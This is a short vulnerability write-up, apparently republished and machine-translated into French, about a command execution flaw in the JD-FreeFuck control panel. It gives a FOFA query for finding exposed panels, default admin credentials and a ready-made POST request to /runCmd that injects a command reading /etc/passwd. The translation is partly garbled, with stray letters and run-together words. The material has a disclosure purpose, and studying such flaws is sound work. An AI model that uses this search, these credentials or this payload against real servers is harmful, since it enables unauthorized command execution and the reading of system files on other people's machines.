当前位置:网站首页>Vulnérabilité d'exécution de la commande de fond du panneau de commande JD - freefuck

Vulnérabilité d'exécution de la commande de fond du panneau de commande JD - freefuck

2022-04-23 18:05:00 Solitaire et paresseux

Description de la vulnérabilité

i JD-FreeFuck Une vulnérabilité d'exécution de commandes de fond existe,Parce que le contenu n'a pas été filtré lors de l'exécution de la commande,Permet d'exécuter n'importe quelle commande,Serveur de contrôle Adresse du projet: https://github.com/meselson/JD-FreeFuck

Impact de la vulnérabilité

s JD-FreeFuck

Cartographie spatiale

d FOFA:title="Panneau de commande en laine Jingdong"

Replay of vulnerability

  • La page de connexion après la visite est la suivante

image-20220422224258613

  • Numéro de compte par défautuseradmin/supermanito
POST /runCmd HTTP/1.1

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

image-20220422224428337

Blogs personnels

Solitaire et paresseux:https://gylq.gitee.io/time

版权声明
本文为[Solitaire et paresseux]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231804351608.html

边栏推荐

猜你喜欢

随机推荐